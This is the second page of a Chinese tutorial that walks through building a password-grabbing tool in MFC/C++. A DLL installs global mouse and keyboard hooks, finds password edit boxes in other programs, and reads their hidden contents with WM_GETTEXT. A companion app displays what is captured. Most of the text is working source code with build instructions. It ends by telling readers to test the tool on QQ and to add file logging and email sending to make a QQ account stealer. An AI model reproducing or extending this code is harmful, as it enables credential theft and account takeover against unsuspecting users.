当前位置: 论文资料 >> 计算机论文 >> 计算机应用 >> 利用鼠标键盘钩子截获密码
利用鼠标键盘钩子截获密码

5:加入枚举窗口的函数。如下:(注意,因为前面的函数据要用到此函数,所以要么在前面声明,要么放在上面函数之前定义。

BOOL WINAPI EnumWndProc(HWND hwnd,LPARAM lParam)
{  file://enum the child window,find passedit
 if(hwnd)
 {
  LONG style=::GetWindowLong(hwnd,GWL_STYLE); file://得到STYLE
  if(style&ES_PASSWORD)   file://是密码框
  {
   char szPass[255];
   ::SendMessage(hwnd,WM_GETTEXT,255,(LPARAM)szPass); file://得到PASS
   ::SendMessage(hOutPutWnd,WM_SETTEXT,0,(LPARAM)szPass); file://显示
   return TRUE;
  }
 }

 return TRUE;
}

6:在DEF文件中定义段属性: (这步很重要)
  SECTIONS
  mydata READ WRITE SHARED

7:完成StartHook,StopHook函数,启动/关闭钩子,如下:
BOOL CGetPassHook::StartHook(HWND hwnd)
{   file://install hoook
 hMouseHook=SetWindowsHookEx(WH_MOUSE,MouseHookProc,glhInstance,0);
   file://mouse hook
 hKeyBoardHook=SetWindowsHookEx(WH_KEYBOARD,KeyBoardProc,glhInstance,0);
   file://keyboard hook
 if(hMouseHook&&hKeyBoardHook)
 {
  hOutPutWnd=hwnd; file://显示密码的句柄
  return TRUE;
 }
 return FALSE;
}

BOOL CGetPassHook::StopHook()
{   file://unstall hook
 BOOL mHook=UnhookWindowsHookEx(hMouseHook);
 BOOL kHook=UnhookWindowsHookEx(hKeyBoardHook);
 if(mHook&&kHook)
  return TRUE;
 return FALSE;
}

8:在DLLMAIN函数中得到DLL句柄,要用到glhInstance变量,因此要加入一句,如下:
extern HINSTANCE glhInstance; file://记得这里
extern "C" int APIENTRY
DllMain(HINSTANCE hInstance, DWORD dwReason, LPVOID lpReserved)
{
 UNREFERENCED_PARAMETER(lpReserved);
 if (dwReason == DLL_PROCESS_ATTACH)
 {
  TRACE0("GETPASS.DLL Initializing!\n");
 
  if (!AfxInitExtensionModule(GetPassDLL, hInstance))
   return 0;
  new CDynLinkLibrary(GetPassDLL);
  glhInstance=hInstance; file://得到句柄
 }
 else if (dwReason == DLL_PROCESS_DETACH)
 {
  TRACE0("GETPASS.DLL Terminating!\n");
  AfxTermExtensionModule(GetPassDLL);
 }
 return 1;   // ok
}

9:编译,完成DLL部分,

下面建立APP部分。如下:

1:新建MFC AppWizard(exe)命名为GetPassWord,并在第一步中选择Add to Current WorkSpace加入到当前工作区,这样方便。

2:将刚才的DLL中的GetPass.lib,和GetPassHook.h拷贝APP所在目录,然后Project->Add to Project-->Files
选择这两个文件。

2:在主对话框中,加入一个EDIT,ID 为IDC_EDIT_PASS

3:在CGetPassWordDlg.h中包含GetPassHook.h文件,声明一个对象。如下:

#include "GetPassHook.h"
class CGetPassWordDlg : public CDialog
{
protected:
 CGetPassHook m_hook;
。。。
 DECLARE_MESSAGE_MAP()
};

4:在实现文件中:OnInitDialog()中起动HOOK

BOOL CGetPassWordDlg::OnInitDialog()
{
 CWnd *pWnd=GetDlgItem(IDC_EDIT_PASS);
 m_hook.StartHook(pWnd->GetSafeHwnd()); file://install hook

 return TRUE;  // return TRUE  unless you set the focus to a control
}

5:加入WM_DESTROY消息,在退出程序时停止HOOK,如下:
void CGetPassWordDlg::OnDestroy()
{
 CDialog::OnDestroy();
 m_hook.StopHook(); file://stop hook
}

6:将GetPass.dll拷贝到。EXE一个目录下,

7:编译,运行.
 这样,你在输入任何密码框输入密码时,密码都将截获。就算键盘HOOK失效,移动鼠标到密码框,也都获取*号密码,因为我们安装两个HOOK。启动QQ,输入密码,试下看是否已经截获了密码?将本程序稍做修改,将截获的密码输出到文件,并加入发送邮件攻能,一个QQ盗号器就做成了。

上一页  [1] [2]